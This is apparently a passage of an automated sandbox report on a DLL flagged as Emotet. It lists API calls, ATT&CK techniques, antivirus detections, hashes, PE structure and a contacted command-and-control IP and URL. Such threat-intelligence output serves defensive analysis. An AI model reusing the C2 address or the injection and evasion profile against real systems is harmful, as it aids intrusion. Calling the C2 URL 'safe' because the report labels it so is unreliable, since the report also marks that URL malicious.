                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_1004E66C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_1004E7A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_100477C3
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10048EDF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10048EDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10045F08 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_10045F08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_1003D032

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B92A __EH_prolog3_GS,lstrlenW,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,3_2_1000B92A

                      Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| Valid Accounts | Native API 1 | Path Interception | Process Injection 112 | Masquerading 2 | Input Capture 2 | System Time Discovery 2 | Remote Services | Input Capture 2 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Security Software Discovery 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 27 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

                      Behavior Graph

[Figure: behavior graph. Behavior Graph ID: 531996, Sample: spZRMihlrkFGqYq1f.dll, Start date: 01/12/2021, Architecture: WINDOWS, Score: 96. Process chain: loaddll32.exe starts rundll32.exe and cmd.exe, each of which starts further rundll32.exe processes; one rundll32.exe connects to 51.178.61.60 on port 443 (OVHFR, France) and is flagged "System process connects to network (likely due to code injection or exploit)".]

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
spZRMihlrkFGqYq1f.dll | 43% | Metadefender |
spZRMihlrkFGqYq1f.dll | 57% | ReversingLabs | Win32.Trojan.Mansabo

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
3.2.rundll32.exe.4710000.5.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.3fc0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.34d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.58b0000.11.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4a70000.11.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.59a0000.13.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4910000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5bd0000.17.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.56e0000.7.unpack | 100% | Avira | HEUR/AGEN.1110387
6.2.rundll32.exe.42d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.4ed0000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.4630000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5840000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.48b0000.7.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5600000.5.unpack | 100% | Avira | HEUR/AGEN.1110387
4.2.rundll32.exe.30d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5ac0000.15.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://51.178.61.60/ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                      Contacted IPs


                      Public


                      General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 531996
Start date: 01.12.2021
Start time: 16:10:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: spZRMihlrkFGqYq1f.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@17/0@0/20
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 99.3% (good quality ratio 91.2%)
• Quality average: 75.6%
• Quality standard deviation: 29.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 33
• Number of non-executed functions: 140
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/531996/sample/spZRMihlrkFGqYq1f.dll

                      Simulations

                      Behavior and APIs

Time | Type | Description
16:12:45 | API Interceptor | 7x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs


                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN


                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a8fehiVK2JSx.dllGet hashmaliciousBrowse
                                                                                                      • 51.178.61.60

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      No created / dropped files found

                                                                                                      Static File Info

                                                                                                      General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.7859159976425
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 95.51%
• InstallShield setup (43055/19) 4.10%
• Generic Win/DOS Executable (2004/3) 0.19%
• DOS Executable Generic (2002/1) 0.19%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: spZRMihlrkFGqYq1f.dll
File size: 712704
MD5: 9f4fa905fd685d28c4ff28f24ad224a1
SHA1: e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256: 808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf
SHA512: d8c33eb38fe54e40d463f20b6091c88863f0fadc70382ad826d7c33e61d696af614e9ba8c73f84d4e13fb141289d5bd978451a5565f61e869a054a837fdef5e0
SSDEEP: 12288:WKEUkuAOLka1miSmuYr1V7nAobS3qTHPR101D:TEQLka1nBVDAoS3WvR
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y.V.8...8...8..I7...8..I7...8...8...:.......8.......8......48.......8.......8.......8.......8..Rich.8..........PE..L...(..a...

                                                                                                      File Icon

                                                                                                      Icon Hash:be71f1aca0b8c0c4

                                                                                                      Static PE Info

                                                                                                      General

Entrypoint: 0x1003d301
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp: 0x61A0C528 [Fri Nov 26 11:29:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d8c52655a835ecb2c6fea489c7c7674b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      cmp dword ptr [esp+08h], 01h
                                                                                                      jne 00007FF29CC13127h
                                                                                                      call 00007FF29CC1ECF7h
                                                                                                      push dword ptr [esp+04h]
                                                                                                      mov ecx, dword ptr [esp+10h]
                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                      call 00007FF29CC13012h
                                                                                                      pop ecx
                                                                                                      retn 000Ch
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov edi, dword ptr [ebp+10h]
                                                                                                      mov eax, edi
                                                                                                      sub eax, 00000000h
                                                                                                      je 00007FF29CC1470Bh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC146F3h
                                                                                                      dec eax
                                                                                                      je 00007FF29CC146BEh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC1466Fh
                                                                                                      dec eax
                                                                                                      je 00007FF29CC145DFh
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      push ebx
                                                                                                      push 00000020h
                                                                                                      pop edx
                                                                                                      jmp 00007FF29CC13597h
                                                                                                      mov esi, dword ptr [eax]
                                                                                                      cmp esi, dword ptr [ecx]
                                                                                                      je 00007FF29CC1319Eh
                                                                                                      movzx esi, byte ptr [eax]
                                                                                                      movzx ebx, byte ptr [ecx]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1358Fh
                                                                                                      movzx esi, byte ptr [eax+01h]
                                                                                                      movzx ebx, byte ptr [ecx+01h]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1356Eh
                                                                                                      movzx esi, byte ptr [eax+02h]
                                                                                                      movzx ebx, byte ptr [ecx+02h]
                                                                                                      sub esi, ebx
                                                                                                      je 00007FF29CC13137h
                                                                                                      xor ebx, ebx
                                                                                                      test esi, esi
                                                                                                      setnle bl
                                                                                                      lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                      mov esi, ebx
                                                                                                      test esi, esi
                                                                                                      jne 00007FF29CC1354Dh
                                                                                                      movzx eax, byte ptr [eax]

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [RES] VS2005 build 50727
                                                                                                      • [ C ] VS2005 build 50727
                                                                                                      • [EXP] VS2005 build 50727
                                                                                                      • [C++] VS2005 build 50727
                                                                                                      • [ASM] VS2005 build 50727
                                                                                                      • [LNK] VS2005 build 50727

                                                                                                      Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x70890 | 0x4e | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dec8 | 0xf0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x9af8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0x767c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x63558 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x58000 | 0x7d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x6de40 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                                      Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x566b7 | 0x57000 | False | 0.574984846444 | data | 6.6363911364 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x58000 | 0x188de | 0x19000 | False | 0.30236328125 | data | 4.88012998463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x71000 | 0x2a254 | 0x27000 | False | 0.931434044471 | data | 7.84888321435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x9c000 | 0x9af8 | 0xa000 | False | 0.241723632813 | data | 3.85640321845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xa6000 | 0xbd48 | 0xc000 | False | 0.347106933594 | data | 4.87718770475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                                                                                                      Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_CURSOR | 0x9d780 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9d8b4 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9d968 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9da9c | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9db50 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9dc84 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9dd38 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9de6c | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9df20 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9e054 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9e108 | 0x200 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9e308 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9e3bc | 0x200 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9e5bc | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9e670 | 0x200 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9e870 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9e924 | 0x200 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9eb24 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9ebd8 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9ed0c | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9edc0 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9eef4 | 0xb4 | data | English | United States |
| RT_CURSOR | 0x9efa8 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9f0dc | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f210 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f344 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f478 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f5ac | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f6e0 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f814 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9f948 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9fa7c | 0x134 | data | English | United States |
| RT_CURSOR | 0x9fbb0 | 0x134 | AmigaOS bitmap font | English | United States |
| RT_CURSOR | 0x9fce4 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9fe18 | 0x134 | data | English | United States |
| RT_CURSOR | 0x9ff4c | 0x134 | data | English | United States |
| RT_CURSOR | 0xa0080 | 0x134 | data | English | United States |
| RT_CURSOR | 0xa01b4 | 0xb4 | data | English | United States |
| RT_BITMAP | 0xa0268 | 0x4a0 | data | English | United States |
| RT_BITMAP | 0xa0708 | 0x2c0 | data | English | United States |
| RT_BITMAP | 0xa09c8 | 0xb8 | data | English | United States |
| RT_BITMAP | 0xa0a80 | 0x144 | data | English | United States |
| RT_ICON | 0xa0bc4 | 0x2e8 | data | English | United States |
| RT_ICON | 0xa0eac | 0x2e8 | data | English | United States |
| RT_MENU | 0xa1194 | 0x15c | data | English | United States |
| RT_MENU | 0xa12f0 | 0x42e | data | English | United States |
| RT_MENU | 0xa1720 | 0x25c | data | English | United States |
| RT_MENU | 0xa197c | 0x478 | data | English | United States |
| RT_DIALOG | 0xa1df4 | 0x1da | data | English | United States |
| RT_DIALOG | 0xa1fd0 | 0x3ea | data | English | United States |
| RT_DIALOG | 0xa23bc | 0x250 | data | English | United States |
| RT_DIALOG | 0xa260c | 0xd2 | data | English | United States |
| RT_DIALOG | 0xa26e0 | 0xe8 | data | English | United States |
| RT_DIALOG | 0xa27c8 | 0x1a2 | data | English | United States |
| RT_DIALOG | 0xa296c | 0x15a | data | English | United States |
| RT_DIALOG | 0xa2ac8 | 0x34 | data | English | United States |
| RT_STRING | 0xa2afc | 0x102 | data | English | United States |
| RT_STRING | 0xa2c00 | 0x124 | data | English | United States |
| RT_STRING | 0xa2d24 | 0xd8 | data | English | United States |
| RT_STRING | 0xa2dfc | 0x7c | data | English | United States |
| RT_STRING | 0xa2e78 | 0xaa | data | English | United States |
| RT_STRING | 0xa2f24 | 0x8c | data | English | United States |
| RT_STRING | 0xa2fb0 | 0xa2 | data | English | United States |
| RT_STRING | 0xa3054 | 0x1d2 | data | English | United States |
| RT_STRING | 0xa3228 | 0xb0 | data | English | United States |
| RT_STRING | 0xa32d8 | 0x23e | data | English | United States |
| RT_STRING | 0xa3518 | 0x100 | data | English | United States |
| RT_STRING | 0xa3618 | 0x220 | data | English | United States |
                                                                                                      RT_STRING0xa38380x46dataEnglishUnited States
                                                                                                      RT_STRING0xa38800x86dataEnglishUnited States
                                                                                                      RT_STRING0xa39080x1acdataEnglishUnited States
                                                                                                      RT_STRING0xa3ab40xaedataEnglishUnited States
                                                                                                      RT_STRING0xa3b640xcadataEnglishUnited States
                                                                                                      RT_STRING0xa3c300x2adataEnglishUnited States
                                                                                                      RT_STRING0xa3c5c0x192dataEnglishUnited States
                                                                                                      RT_STRING0xa3df00x124dataEnglishUnited States
                                                                                                      RT_STRING0xa3f140x5edataEnglishUnited States
                                                                                                      RT_STRING0xa3f740x4adataEnglishUnited States
                                                                                                      RT_STRING0xa3fc00x4e2dataEnglishUnited States
                                                                                                      RT_STRING0xa44a40x31adataEnglishUnited States
                                                                                                      RT_STRING0xa47c00x2dcdataEnglishUnited States
                                                                                                      RT_STRING0xa4a9c0x8adataEnglishUnited States
                                                                                                      RT_STRING0xa4b280x32edataEnglishUnited States
                                                                                                      RT_STRING0xa4e580xdedataEnglishUnited States
                                                                                                      RT_STRING0xa4f380x4c4dataEnglishUnited States
                                                                                                      RT_STRING0xa53fc0x264dataEnglishUnited States
                                                                                                      RT_STRING0xa56600x2cdataEnglishUnited States
                                                                                                      RT_STRING0xa568c0x42dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa56d00x78dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57480x50dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57980x18dataEnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57b00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57d40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57f80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa581c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58400x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58640x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58880x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58d00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58f40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa593c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa599c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
